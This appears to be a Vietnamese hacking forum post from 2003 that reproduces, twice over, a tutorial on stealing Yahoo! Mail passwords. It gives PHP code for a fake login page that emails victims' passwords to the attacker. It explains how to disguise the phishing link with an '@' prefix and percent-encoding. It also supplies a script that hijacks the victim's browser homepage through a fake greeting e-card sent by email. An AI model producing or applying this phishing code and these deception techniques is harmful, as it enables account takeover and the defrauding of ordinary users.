Quach_Tinh_lata
20-10-2003, 15:26
Hơi bị dài mong mấy bác chịu khó đọc nha , hay lắm đó...hehehehe
#
Author by : CUCCU ( Members of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by : PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net ……
#
Lời mở đầu:
Trước tiên xin nói trước là bài viết này là của tôi tự nghiên cứu và viết, bất cứ bài viết nào post lại mà không ghi tên tôi là tui "ca cải lương" cho tắt luôn đấy
Thứ hai là xin phép các bác admin và mod cho bài này tồn tại, đừng cho vào sọt nhé
*******************************
Bài viết của tôi có 4 bước:
******************************
Bước 1. Tạo Fake login: Muốn lấy được pass của victim với tỉ lệ thành công cao, bạn phải có một trang Web dỏm y hệt như của Yahoo! Mail
Thuổng của người khác:
QUOTE
Tạo tệp yahoo.PHP, đoạn code như sau: <? $contactemail = "[email protected]"; // $subject = "password of [email protected] : $passwd"; $message = ""; mail($contactemail, $subject, $message); header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last= &promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persistent="); ?> Save as trang chính của yahoo! mail, sau đó mở tệp này bằng Notepate và tìm đến dòng: <FORM name=login_form onfiltered="return hash(this,'http://login.yahoo.com/config/login')" action=http://login.yahoo.com/config/login method=post autocomplete="off"> Thay đoạn này bằng : <FORM action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php" method="post"
Cái này thì cực nhiều hướng dẫn trên diễn đàn rồi, nhưng có một số lỗi sau khiến hiệu quả không được cao:
1: Đoạn code sửa đổi <form> hoạt động tốt, nhưng gây lỗi trên trang Fake login, tôi không hiểu sao mấy chú trên forum quảng cáo rất nhiều về trang Fake login của mình mà không chịu sửa nó đi......
Nếu bạn để ý, làm theo hướng dẫn của bất kì bài viết nào hiện có trên diễn đàn, trang fake login cũng hiện lên 1 biểu tượng báo lỗi (có dấu ! màu vàng) ở Status bar, nếu victim tinh ý 1 tí là nhận ra ngay, không cần nhìn lên đường link làm gì cả
Cách sửa: Thực ra cũng chẳng có gì đáng nói, các chú tiết kiệm quá nên bỏ qua mấy khai báo đơn giản:
Chỉ cần sửa như sau:
<FORM name=login_form action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php" method="post" autocomplete="off">
Ổn rồi phải không, thành công 1 bước nhỏ trong việc che mắt victim........
2. Nhìn cái đường link của mấy chú thấy chán cả người, ai lại giao diện của Yahoo! Mail mà tên đường dẫn lại cực chuối củ...... No problem, thực tế thì chẳng ai đăng kí được 1 cái domain giông giống như mail.yahoo.com cả...... Cách khắc phục đây:
Cái này thuổng của người khác:
QUOTE
Nếu trước đường link, ta thêm "@", rồi oánh lia lịa các kí tự vớ vỉn, thì IE cũng chỉ công nhận các kí tự ở đằng sau "@" mà thôi
1 ý tưởng hay, do đó, bạn có thể thêm www.mail.yahoo@ vào đằng trước đường link của bạn,
VD: http://www.mail.yahoo@trang Web có hỗ trợ php/tên đăng kí của bạn
hehhe, thường là victim chỉ nhìn mấy cái chữ đầu của đường link mà thôi, do đó nhìn như vậy cũng tạm ổn phải không..... nếu chú nào dể tính thì uh, nhưng tôi thì không, đã làm là phải lừa không được 100% thì cũng phải 95-96% chứ, nhìn cái tên trang Web của bạn nó vẫn lù lù đằng sau kia kìa, ai mà chẳng nhận ra.....
Do đó, có 1 cách cực hay sau:
Mã hoá Url: Dùng cái này có thể mã hoá đường link của bạn thành các kí tự loằng ngoằng, khó ai dịch được (nhưng IE lại chấp nhận). điều đó sẽ khiến victim không đề phòng nổi do đường link trông hầu như hao hao với trang Yahoo! Mail khi ta Sign Out
Giới thiệu qua: Forum http://www.vnhacker.org/forum khi được mã hoá sẽ như sau:
http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D
Trông loằng ngoăng hợp lệ chưa??? Bạn thử copy đường link trên cho chạy thử xem sao???Đảm bảo dẫn đến forum..... hehheh
Và sau đây là bảng hướng dẫn mã hoá:
a ---> %61 b ---> %62 c ---> %63 d ---> %64 e ---> %65
A ---> %41 B ---> %42 C ---> %43 D ---> %44 E ---> %45
f ---> %66 g ---> %67 h ---> %68 i ---> %69 j ---> %6A
F ---> %46 G ---> %47 H ---> %48 I ---> %49 J ---> %4A
k ---> %6B l ---> %6C m ---> %6D n ---> %6E o ---> %6F
K ---> %4B L ---> %4C M ---> %4D N ---> %4E O ---> %4F
p ---> %70 q ---> %71 r ---> %72 s ---> %73 t ---> %74
P ---> %50 Q ---> %51 R ---> %52 S ---> %53 T ---> %54
u ---> %75 v ---> %76 w ---> %77 x ---> %78 y ---> %79
U ---> %55 V ---> %56 W ---> %57 X ---> %58 Y ---> %59
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
Okie, được rồi đó, lưu ý như sau: đường link nào dù loằng ngoằng đến đâu thì cũng vẫn có các chữ và con số, do đó bạn không nên mã hoá tất cả, mà chỉ mã hoá 1 số từ nhạy cảm, ví dụ www11.brinkster.com chẳng hạn, để victim không nhận ra là brinkster, bạn mã hoá một số từ thôi:
w%77w1%31.br%69ks%74er%2Ecom
hehhe, hợp lý chứ.......
Thành công nhe.....
************************************************** ********
Bài viết của Cuccu__
************************************************** ********
Bước 1 tôi giới thiệu trên mọi người đều có thể làm được, không có gì mới cả, tôi chỉ hướng dẫn các bạn cách mã hoá và sửa lỗi của trang fake login cho hoàn hảo hơn mà thôi, nếu các bạn khéo dùng, có thể lừa được khá nhiều người, có thể nói là kể cả những người kha khá về fake login cũng bị lừa như chơi, nếu không cảnh giác cao độ......
Nhưng độ chính xác của con mồi không được cao, chẳng nhẽ lại rủ victim vào cửa hàng nào đó hay là shere cho victim cái trang này???? Không hợp lý.....
Bước 2 dưới đây cho phép bạn ở Việt Nam, thay đổi homepage address ở tận bên Mỹ.... hehhe, sướng không Theo điều tra của tôi, thì khoảng 100 máy tính cá nhân có nối mạng thì khoảng 60% là có set homepage vào các trang hay dùng, điển hình như mail.yahoo.com, hotmail.com, vnexpress.net.....
như vậy, cho dù bạn có set homepage lén vào máy victim, cũng không hề bị phát hiện.
Hiện nay có con virus Html/Sam.A cũng có chức năng tương tự, nhưng đã bị công bố mã nguồn và hầu hết các chương trình diệt virus diệt được......Nên tôi dùng cách khác.....
Từ các bước sau, yêu cầu các bạn phải nắm được tương đối cách lập trình Web, đơn giản thôi, chỉ là các _JavaScript và Html , không có gì phức tạp cả, với mức độ ngày càng khó (hic, đầu tư tí chất xám mới thành công được, phải không nhỉ )
**********************************************
Bước 2: Mượn gió bẻ măng, hay gọi là ném đá giấu tay cũng được
Giải thích ý tưởng: Tôi đã ngâm cứu thành công 1 dạng fake greeting ecard, dùng frame kết hợp với _JavaScript để đánh lừa victim (hic nói ra thì tôi còn lừa được ai nữa !!!!), ecard do bạn tạo ra càng đẹp, thì độ mắc lừa của victim càng cao..... Khi victim nghĩ đấy là 1 ecard thật, tất nhiên sẽ click vào 1 nút nào đó, ví dụ như nút có tên là Begin chẳng hạn, khi click vào đó, thì sẽ có 1 bảng thông báo của Homepage, cái này là khuyết điểm duy nhất của bước này, nhưng tôi tin là không ai nghi ngờ cả, vì hầu như trang eCard xịn nào cũng có những thông báo và PopUp, thành ra thông báo đó sẽ không ai để ý. Khi victim click vào Okie, thì eCard sẽ mở ra và ten tèn ten, máy của victim đã bị set homepage address là trang fake login của mình rồi.......
Nếu bạn là người thích sưu tầm pass, thì đây là 1 cách lí tưởng, còn nếu không, thì thích hợp cho victim có nối mạng ở nhà......
Phần 3 tôi sẽ hướng dẫn các bạn cách đánh thẳng mục tiêu, đã nhằm victim nào là không thể chạy được....., cách này nói chung là đối với những ai rành lập trình Web thì tương đối đơn giản, còn Newbie thì sẽ rất khó khăn đấy......
*********************************************
1) Làm trang fake ecard
Ví dụ: http://w%77w%2Emir%63%64.us/%70%79mn%71h/@6%2Eh%74m
(click vào OK xem kết quả, yên tâm không thành victim đâu)
Sau đây là hướng dẫn:
Thực chất của vấn đề là đoạn script set homepage,
Đoạn script đó như sau:
QUOTE
<A title="Tiêu đề của bạn" href="Đường dẫn đến trang ecard dởm của bạn" target=_self onfiltered="this.style.behavior='url(#default#homepage)'; this.setHomePage('đường dẫn đến trang fake login của bạn');">tên nút</a>
Lưu ý là đường dẫn đến trang fake login phải có 2 dấu ', nếu không nó không hoạt động đâu
Đoạn Script này có tác dụng tạo 1 nút, vừa mở ra 1 trang mới, vừa set homepage address, thành ra hiệu quả cực cao......
Còn làm giao diện trang eCard như thế nào là tuỳ thuộc vào bạn
2. Tạo thư có giao diện như 1 ecard mail
Sau đó, bạn lập 1 hòm thư mới, có tên gì nghe liên quan đến eCard 1 tí, tạo 1 thư có giao diện như 1 ecard (rất đơn giản, bạn chỉ cần copy/paste 1 cái Greeting card bất kì, sau đó dán vào Msg box của bạn, chỉnh sửa đường dẫn đến ecard của bạn là xong (nhớ mã hoá đường dẫn nhé ), khi victim click vào..... hêhhhe, các bạn cũng đoán được kết quả rồi đó....)
Chúc thành công!
#
Author by : CUCCU ( Members of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by : PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net ……
#
Lời mở đầu:
Trước tiên xin nói trước là bài viết này là của tôi tự nghiên cứu và viết, bất cứ bài viết nào post lại mà không ghi tên tôi là tui "ca cải lương" cho tắt luôn đấy
Thứ hai là xin phép các bác admin và mod cho bài này tồn tại, đừng cho vào sọt nhé
*******************************
Bài viết của tôi có 4 bước:
******************************
Bước 1. Tạo Fake login: Muốn lấy được pass của victim với tỉ lệ thành công cao, bạn phải có một trang Web dỏm y hệt như của Yahoo! Mail
Thuổng của người khác:
QUOTE
Tạo tệp yahoo.PHP, đoạn code như sau: <? $contactemail = "[email protected]"; // $subject = "password of [email protected] : $passwd"; $message = ""; mail($contactemail, $subject, $message); header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last= &promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persistent="); ?> Save as trang chính của yahoo! mail, sau đó mở tệp này bằng Notepate và tìm đến dòng: <FORM name=login_form onfiltered="return hash(this,'http://login.yahoo.com/config/login')" action=http://login.yahoo.com/config/login method=post autocomplete="off"> Thay đoạn này bằng : <FORM action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php" method="post"
Cái này thì cực nhiều hướng dẫn trên diễn đàn rồi, nhưng có một số lỗi sau khiến hiệu quả không được cao:
1: Đoạn code sửa đổi <form> hoạt động tốt, nhưng gây lỗi trên trang Fake login, tôi không hiểu sao mấy chú trên forum quảng cáo rất nhiều về trang Fake login của mình mà không chịu sửa nó đi......
Nếu bạn để ý, làm theo hướng dẫn của bất kì bài viết nào hiện có trên diễn đàn, trang fake login cũng hiện lên 1 biểu tượng báo lỗi (có dấu ! màu vàng) ở Status bar, nếu victim tinh ý 1 tí là nhận ra ngay, không cần nhìn lên đường link làm gì cả
Cách sửa: Thực ra cũng chẳng có gì đáng nói, các chú tiết kiệm quá nên bỏ qua mấy khai báo đơn giản:
Chỉ cần sửa như sau:
<FORM name=login_form action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php" method="post" autocomplete="off">
Ổn rồi phải không, thành công 1 bước nhỏ trong việc che mắt victim........
2. Nhìn cái đường link của mấy chú thấy chán cả người, ai lại giao diện của Yahoo! Mail mà tên đường dẫn lại cực chuối củ...... No problem, thực tế thì chẳng ai đăng kí được 1 cái domain giông giống như mail.yahoo.com cả...... Cách khắc phục đây:
Cái này thuổng của người khác:
QUOTE
Nếu trước đường link, ta thêm "@", rồi oánh lia lịa các kí tự vớ vỉn, thì IE cũng chỉ công nhận các kí tự ở đằng sau "@" mà thôi
1 ý tưởng hay, do đó, bạn có thể thêm www.mail.yahoo@ vào đằng trước đường link của bạn,
VD: http://www.mail.yahoo@trang Web có hỗ trợ php/tên đăng kí của bạn
hehhe, thường là victim chỉ nhìn mấy cái chữ đầu của đường link mà thôi, do đó nhìn như vậy cũng tạm ổn phải không..... nếu chú nào dể tính thì uh, nhưng tôi thì không, đã làm là phải lừa không được 100% thì cũng phải 95-96% chứ, nhìn cái tên trang Web của bạn nó vẫn lù lù đằng sau kia kìa, ai mà chẳng nhận ra.....
Do đó, có 1 cách cực hay sau:
Mã hoá Url: Dùng cái này có thể mã hoá đường link của bạn thành các kí tự loằng ngoằng, khó ai dịch được (nhưng IE lại chấp nhận). điều đó sẽ khiến victim không đề phòng nổi do đường link trông hầu như hao hao với trang Yahoo! Mail khi ta Sign Out
Giới thiệu qua: Forum http://www.vnhacker.org/forum khi được mã hoá sẽ như sau:
http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D
Trông loằng ngoăng hợp lệ chưa??? Bạn thử copy đường link trên cho chạy thử xem sao???Đảm bảo dẫn đến forum..... hehheh
Và sau đây là bảng hướng dẫn mã hoá:
a ---> %61 b ---> %62 c ---> %63 d ---> %64 e ---> %65
A ---> %41 B ---> %42 C ---> %43 D ---> %44 E ---> %45
f ---> %66 g ---> %67 h ---> %68 i ---> %69 j ---> %6A
F ---> %46 G ---> %47 H ---> %48 I ---> %49 J ---> %4A
k ---> %6B l ---> %6C m ---> %6D n ---> %6E o ---> %6F
K ---> %4B L ---> %4C M ---> %4D N ---> %4E O ---> %4F
p ---> %70 q ---> %71 r ---> %72 s ---> %73 t ---> %74
P ---> %50 Q ---> %51 R ---> %52 S ---> %53 T ---> %54
u ---> %75 v ---> %76 w ---> %77 x ---> %78 y ---> %79
U ---> %55 V ---> %56 W ---> %57 X ---> %58 Y ---> %59
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
Okie, được rồi đó, lưu ý như sau: đường link nào dù loằng ngoằng đến đâu thì cũng vẫn có các chữ và con số, do đó bạn không nên mã hoá tất cả, mà chỉ mã hoá 1 số từ nhạy cảm, ví dụ www11.brinkster.com chẳng hạn, để victim không nhận ra là brinkster, bạn mã hoá một số từ thôi:
w%77w1%31.br%69ks%74er%2Ecom
hehhe, hợp lý chứ.......
Thành công nhe.....
************************************************** ********
Bài viết của Cuccu__
************************************************** ********
Bước 1 tôi giới thiệu trên mọi người đều có thể làm được, không có gì mới cả, tôi chỉ hướng dẫn các bạn cách mã hoá và sửa lỗi của trang fake login cho hoàn hảo hơn mà thôi, nếu các bạn khéo dùng, có thể lừa được khá nhiều người, có thể nói là kể cả những người kha khá về fake login cũng bị lừa như chơi, nếu không cảnh giác cao độ......
Nhưng độ chính xác của con mồi không được cao, chẳng nhẽ lại rủ victim vào cửa hàng nào đó hay là shere cho victim cái trang này???? Không hợp lý.....
Bước 2 dưới đây cho phép bạn ở Việt Nam, thay đổi homepage address ở tận bên Mỹ.... hehhe, sướng không Theo điều tra của tôi, thì khoảng 100 máy tính cá nhân có nối mạng thì khoảng 60% là có set homepage vào các trang hay dùng, điển hình như mail.yahoo.com, hotmail.com, vnexpress.net.....
như vậy, cho dù bạn có set homepage lén vào máy victim, cũng không hề bị phát hiện.
Hiện nay có con virus Html/Sam.A cũng có chức năng tương tự, nhưng đã bị công bố mã nguồn và hầu hết các chương trình diệt virus diệt được......Nên tôi dùng cách khác.....
Từ các bước sau, yêu cầu các bạn phải nắm được tương đối cách lập trình Web, đơn giản thôi, chỉ là các _JavaScript và Html , không có gì phức tạp cả, với mức độ ngày càng khó (hic, đầu tư tí chất xám mới thành công được, phải không nhỉ )
**********************************************
Bước 2: Mượn gió bẻ măng, hay gọi là ném đá giấu tay cũng được
Giải thích ý tưởng: Tôi đã ngâm cứu thành công 1 dạng fake greeting ecard, dùng frame kết hợp với _JavaScript để đánh lừa victim (hic nói ra thì tôi còn lừa được ai nữa !!!!), ecard do bạn tạo ra càng đẹp, thì độ mắc lừa của victim càng cao..... Khi victim nghĩ đấy là 1 ecard thật, tất nhiên sẽ click vào 1 nút nào đó, ví dụ như nút có tên là Begin chẳng hạn, khi click vào đó, thì sẽ có 1 bảng thông báo của Homepage, cái này là khuyết điểm duy nhất của bước này, nhưng tôi tin là không ai nghi ngờ cả, vì hầu như trang eCard xịn nào cũng có những thông báo và PopUp, thành ra thông báo đó sẽ không ai để ý. Khi victim click vào Okie, thì eCard sẽ mở ra và ten tèn ten, máy của victim đã bị set homepage address là trang fake login của mình rồi.......
Nếu bạn là người thích sưu tầm pass, thì đây là 1 cách lí tưởng, còn nếu không, thì thích hợp cho victim có nối mạng ở nhà......
Phần 3 tôi sẽ hướng dẫn các bạn cách đánh thẳng mục tiêu, đã nhằm victim nào là không thể chạy được....., cách này nói chung là đối với những ai rành lập trình Web thì tương đối đơn giản, còn Newbie thì sẽ rất khó khăn đấy......
*********************************************
1) Làm trang fake ecard
Ví dụ: http://w%77w%2Emir%63%64.us/%70%79mn%71h/@6%2Eh%74m
(click vào OK xem kết quả, yên tâm không thành victim đâu)
Sau đây là hướng dẫn:
Thực chất của vấn đề là đoạn script set homepage,
Đoạn script đó như sau:
QUOTE
<A title="Tiêu đề của bạn" href="Đường dẫn đến trang ecard dởm của bạn" target=_self onfiltered="this.style.behavior='url(#default#homepage)'; this.setHomePage('đường dẫn đến trang fake login của bạn');">tên nút</a>
Lưu ý là đường dẫn đến trang fake login phải có 2 dấu ', nếu không nó không hoạt động đâu
Đoạn Script này có tác dụng tạo 1 nút, vừa mở ra 1 trang mới, vừa set homepage address, thành ra hiệu quả cực cao......
Còn làm giao diện trang eCard như thế nào là tuỳ thuộc vào bạn
2. Tạo thư có giao diện như 1 ecard mail
Sau đó, bạn lập 1 hòm thư mới, có tên gì nghe liên quan đến eCard 1 tí, tạo 1 thư có giao diện như 1 ecard (rất đơn giản, bạn chỉ cần copy/paste 1 cái Greeting card bất kì, sau đó dán vào Msg box của bạn, chỉnh sửa đường dẫn đến ecard của bạn là xong (nhớ mã hoá đường dẫn nhé ), khi victim click vào..... hêhhhe, các bạn cũng đoán được kết quả rồi đó....)
Chúc thành công!